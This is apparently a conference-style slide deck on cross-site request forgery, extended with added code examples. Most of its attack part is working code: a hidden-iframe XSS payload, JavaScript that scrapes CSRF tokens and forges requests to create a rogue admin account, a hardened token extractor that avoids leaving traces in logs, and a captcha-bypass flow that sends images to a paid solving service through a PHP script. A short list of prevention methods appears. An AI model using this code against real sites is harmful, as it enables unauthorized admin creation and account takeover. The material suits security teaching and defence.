Cross Site Request Forgery Attacks

1. Cross Site Request Forgery Attacks
   - Security token bypass
   - Captcha bypass
   Presented by Vlad Horatiu [email_address]

2. What is CSRF
3. Context
   - What we have:
     - Access to a web site that the victim is likely to visit
     - A Cross Site Scripting (XSS) bug in the domain where the victim holds elevated privileges

4. Basic principle
   - The victim visits the site we control
   - Through the XSS, JavaScript running in the victim's browser sends requests to the target site where the victim is authenticated
5. Why do we need XSS?
   - Modern browsers allow AJAX requests, and access to a page's HTML source, only as long as both the requesting page and its target are on the same origin (scheme, host and port): the same-origin policy
   - This protection only restricts reading the source of a page on another domain; it has no effect on loading that page (e.g. in an iframe). Without XSS we can therefore make the victim's browser send requests to the target, cookies included, but we cannot read the responses, and the token and captcha bypasses below depend on reading them
   - Why?
     - Security
     - Implications for web advertising
     - Security
6. Initiating the attack
   - An iframe on the site we control, pointing at the XSS on the target site; the injected script in turn writes an iframe that loads the attacker's page inside the target origin ("http://attacker" and the "xss" parameter are placeholders for the attacker's host and for the injection point)

        <html>
        <iframe src="http://victimsite.com/index.php?xss=<script>document.write('<iframe src=\'http://attacker\'></iframe>');</script>"
                width="50" height="50"
                style="filter: alpha(opacity=0); -moz-opacity: 0; opacity: 0;">
        </iframe>
        </html>
7. Login check

        // Runs inside the target origin (possible because of the XSS). Fetches
        // the target's login page and looks for a marker string that only appears
        // when no session exists ('blanaa' is the marker used in the slides; take
        // one from the real page). `done` receives true when the victim ends up
        // logged in.
        function check(done) {
            $.get("login.html", function (data) {
                if (data.indexOf('blanaa') != -1) {
                    tryToLogin(done);   // marker present: not logged in, try to log in
                } else {
                    done(true);         // marker absent: already logged in
                }
            });
        }

        // Submits the login form held in the hidden #form_frame iframe; the
        // username and password fields are expected to have been filled in by
        // the browser's autocomplete (see the captcha slides). The submit is a
        // navigation, so the re-check afterwards may race it.
        function tryToLogin(done) {
            $('#form_frame').contents().find('form').submit();
            $.get("login.html", function (data) {
                done(data.indexOf('blanaa') == -1);   // marker gone: login worked
            });
        }
8. Token bypass
   - Classic CSRF attack URL:
     - http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
   - Valid link when a token protection is in place:
     - http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
   - Code snippets (PHP):
     - Token generation:

            // one token per user, stored server-side at login
            // (mt_rand() is not a CSPRNG; a guessable seed makes the token guessable)
            $token = sha1(mt_rand(1000000, 9999999) . microtime(true));
            mysql_query("INSERT INTO `user_tokens` (`user_id`, `user_token`)
                         VALUES ('" . intval($uid) . "', '" . $token . "')");

     - Token validation:

            $query = mysql_query("SELECT `user_token` FROM `user_tokens`
                                  WHERE `user_id` = '" . intval($uid) . "' LIMIT 1");
            $token = getQueryToken($query);   // helper from the slides: reads the single column
            // the submitted token has to come from the request itself (URL or form
            // field), never from a cookie: the browser attaches cookies to cross-site
            // requests as well, so a cookie comparison would always succeed
            $submitted = isset($_POST['token']) ? $_POST['token']
                       : (isset($_GET['token']) ? $_GET['token'] : '');
            if ($submitted != $token)
                die('Invalid token');
9. Token bypass
   - JavaScript token crawler (GET)

        // Runs in the target origin (via the XSS): fetch the admin page, pull the
        // token out of the link it contains, then replay the privileged request
        // with that token. The victim's cookies are sent automatically.
        function addAdmin() {
            $.get("http://victimsite.com/admin/add_user.php", function (data) {
                var token = getBetween('&token=', '&', data);
                alert(token);   // demo only
                $.get("http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token=" + token,
                      function (data) { });
            });
        }

        // Returns the text between the first occurrence of `lft` and the next `rgt`
        // ('' when `lft` is not found).
        function getBetween(lft, rgt, string) {
            var split = string.split(lft);
            if (split.length < 2) return '';
            return split[1].split(rgt)[0];
        }
10. Token bypass
   - JavaScript token crawler (POST)

        // Same idea as the GET variant, but the token is read from the hidden
        // form field and sent back as a form POST.
        function addAdmin() {
            $.get("http://victimsite.com/admin/add_user.php", function (data) {
                var token = getBetween('type="hidden" name="token" value="', '"', data);
                $.post("http://victimsite.com/admin/add_user.php",
                       { user: "1337hacker", pass: "pwned", token: token },
                       function (data) { });
            });
        }

        // Returns the text between the first occurrence of `lft` and the next `rgt`
        // ('' when `lft` is not found).
        function getBetween(lft, rgt, string) {
            var split = string.split(lft);
            if (split.length < 2) return '';
            return split[1].split(rgt)[0];
        }
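The two crawlers above read the token with a fixed string split, which breaks as soon as the markup moves. The following is an added example, not code from the slides: an extraction step that tolerates attribute order, quote style, extra attributes and HTML-escaped `&amp;`, covering both places the slides take the token from (a hidden form field and a URL parameter), followed by the forged request built from it. victimsite.com, the field name `token`, the `1337hacker`/`pwned` values and the sample page are the slides' placeholders or constructed inputs for this example.

```javascript
// Added example (not from the slides). Return the value of the first hidden
// <input> whose name attribute is `name`, whatever the attribute order/quoting.
function extractHiddenField(html, name) {
  var inputRe = /<input\b[^>]*>/gi;
  var attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  var tag;
  while ((tag = inputRe.exec(html)) !== null) {
    var attrs = {};
    var m;
    attrRe.lastIndex = 0;
    while ((m = attrRe.exec(tag[0])) !== null) {
      attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2]
                                : m[3] !== undefined ? m[3] : m[4];
    }
    if (attrs.name === name && attrs.value !== undefined) {
      return attrs.value;
    }
  }
  return null;
}

// Return `param`'s value from the first URL in the page that carries it
// (links, form actions, inline script), undoing HTML escaping of "&".
function extractUrlParam(html, param) {
  var unescaped = html.replace(/&amp;/g, '&');
  var re = new RegExp('[?&]' + param + '=([^&"\'\\s<>#]+)');
  var m = re.exec(unescaped);
  return m ? decodeURIComponent(m[1]) : null;
}

// The two sources the previous slides read the token from, in that order.
function findToken(html) {
  var t = extractHiddenField(html, 'token');
  return t !== null ? t : extractUrlParam(html, 'token');
}

// Build the forged request once the token is known. Inside the target origin it
// is sent with fetch(req.url, {method: req.method, body: req.body,
// headers: {'Content-Type': 'application/x-www-form-urlencoded'}}); being
// same-origin, the victim's cookies go with it.
function forgeAddUser(html) {
  var token = findToken(html);
  if (token === null) return null;
  var body = new URLSearchParams({ user: '1337hacker', pass: 'pwned', token: token });
  return {
    url: 'http://victimsite.com/admin/add_user.php',
    method: 'POST',
    body: body.toString()
  };
}

// Constructed sample of an admin page: attribute order and quoting differ from
// the slide's snippet, and the token also appears in an HTML-escaped link.
var SAMPLE_PAGE = [
  '<form method="post" action="/admin/add_user.php">',
  '  <input name="user"><input name="pass" type="password">',
  "  <input value='693a93e07e1032751a2f14d00e33a56f' type=hidden name=\"token\" id='csrf'>",
  '  <input type="submit" value="Add">',
  '</form>',
  '<a href="/admin/add_admin.php?user=x&amp;token=693a93e07e1032751a2f14d00e33a56f&amp;r=1">add</a>'
].join('\n');
```

`findToken(SAMPLE_PAGE)` returns the token from the hidden field; on a page that only links to a token-bearing URL it falls through to the URL parser. A page with neither makes `forgeAddUser` return `null` instead of sending a request with an empty token, which would only draw attention in the server logs.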
11. Token bypass
   - Prevention methods
     - Protection against XSS attacks (the root fix: without script execution in the target origin the token cannot be read)
     - Requiring a captcha for high-risk operations
     - Requiring the password again for high-risk operations
     - Using private browsing
     - Giving sessions a relatively short expiry time
     - Emitting the token in a form that is hard for a script to parse (for example through obfuscated JavaScript)

12. Token bypass
   - Disadvantages
     - Sensitive to changes in the HTML structure
13. Flash cross-domain policy
   - Lets us make AJAX-style requests between two different domains (from a Flash object)
   - The destination domain must list the source domain in a whitelist: crossdomain.xml
   - Example crossdomain.xml; in the captcha bypass below this file sits on the attacker's solver host, so that the Flash object loaded into the target origin can send the captcha image there (a site that serves `*` on its own domain instead exposes every cookie-authenticated response to any origin):

        <cross-domain-policy>
            <allow-access-from domain="*"/>
        </cross-domain-policy>

14. Captcha bypass
   - Context
     - The user's username and password fields are already filled in by the browser's autocomplete
     - The login form requires captcha verification
   - Basic principle
     - Grab the captcha image path with JavaScript
     - Send the image to a captcha-breaking script (through crossdomain.xml)
     - Submit the login data
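The browser-side half of that procedure, as an added example that is not code from the slides: find the captcha image and turn its (often relative, HTML-escaped) path into the absolute URL the solver has to fetch, then upload and poll until the text comes back or the time the victim can be expected to stay on the page runs out. The solver is abstracted as an object with `upload`/`getText`/`remove` so the flow runs offline against the constructed fake at the bottom; in the attack the real one is the Flash bridge to the PHP script on the next slide. The page snippet, the fake's timings and victimsite.com are constructed placeholders.

```javascript
// Added example (not from the slides): browser-side captcha handling.

// Absolute URL of the captcha image: the first <img> that mentions "captcha"
// in any attribute, with its src resolved against the page URL and "&amp;"
// undone, so the solver fetches exactly the image the user was shown.
function findCaptchaImage(html, pageUrl) {
  var imgRe = /<img\b[^>]*>/gi;
  var tag;
  while ((tag = imgRe.exec(html)) !== null) {
    if (!/captcha/i.test(tag[0])) continue;
    var src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i.exec(tag[0]);
    if (!src) continue;
    var raw = (src[1] !== undefined ? src[1] : src[2] !== undefined ? src[2] : src[3])
      .replace(/&amp;/g, '&');
    return new URL(raw, pageUrl).href;
  }
  return null;
}

// Upload the image, then poll until the solver returns text or the budget
// (opts.maxWaitMs) is spent. An unfinished solve is removed so it is not paid
// for, mirroring the remove() call in the PHP script on the next slide.
async function solveCaptcha(solver, imageUrl, opts) {
  var id = await solver.upload(imageUrl);
  var deadline = Date.now() + opts.maxWaitMs;
  while (Date.now() < deadline) {
    var text = await solver.getText(id);
    if (text) return text;
    await new Promise(function (resolve) { setTimeout(resolve, opts.pollMs); });
  }
  await solver.remove(id);
  return null;
}

// Constructed fake solver: answers after `pollsNeeded` polls and records what
// happened, standing in for the real cross-domain call.
function fakeSolver(solution, pollsNeeded) {
  var polls = 0, removed = false;
  return {
    upload: async function () { return 'cid-1'; },
    getText: async function () { polls += 1; return polls >= pollsNeeded ? solution : ''; },
    remove: async function () { removed = true; },
    stats: function () { return { polls: polls, removed: removed }; }
  };
}
```

With a real solver the last step in the victim page is `document.querySelector('input[name=captcha]').value = text` followed by submitting the form from the login-check slide; with `maxWaitMs` set to the minute the disadvantages slide quotes, `solveCaptcha` returning `null` is the case where the victim is expected to have left already.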
15. Captcha bypass
   - Captcha breaking script snippet (PHP, built on the DeathByCaptcha client library; the `require_once` and the `$client` construction are not on the slide and follow that library's documented API, with the account credentials assumed to be in `$dbc_username` / `$dbc_password`):

        require_once 'deathbycaptcha.php';
        $client = new DeathByCaptcha_SocketClient($dbc_username, $dbc_password);

        // save the captcha image from the path the injected script sent us; this
        // only works when the URL itself identifies the challenge (e.g. a sid
        // parameter): a captcha bound to the victim's session cookie would have
        // to be sent as image bytes from the victim's browser instead
        $rand = sha1(mt_rand(1000000, 9999999) . microtime(true));
        if (isset($_GET['path']))
            file_put_contents($rand . '.jpg', file_get_contents($_GET['path']));

        // upload it, give a human solver time to answer, and return the text
        // ('0' when it could not be solved)
        if ($captcha = $client->upload($rand . '.jpg')) {
            echo "CAPTCHA {$captcha['captcha']} uploaded\n";
            sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);
            if ($text = $client->get_text($captcha['captcha'])) {
                echo $text;
            } else {
                $client->remove($captcha['captcha']);
                echo '0';
            }
        }
16. Captcha bypass
   - Disadvantages
     - Long captcha solving time
       - For the method to work, the user has to stay on the page for at least a minute
     - High cost of the captcha solves
     - Changes in the HTML structure
     - Flash Player must be present on the victim's system

17. Concrete examples
   - Adding users to a WordPress platform
   - Adding a MySQL user

18. Questions
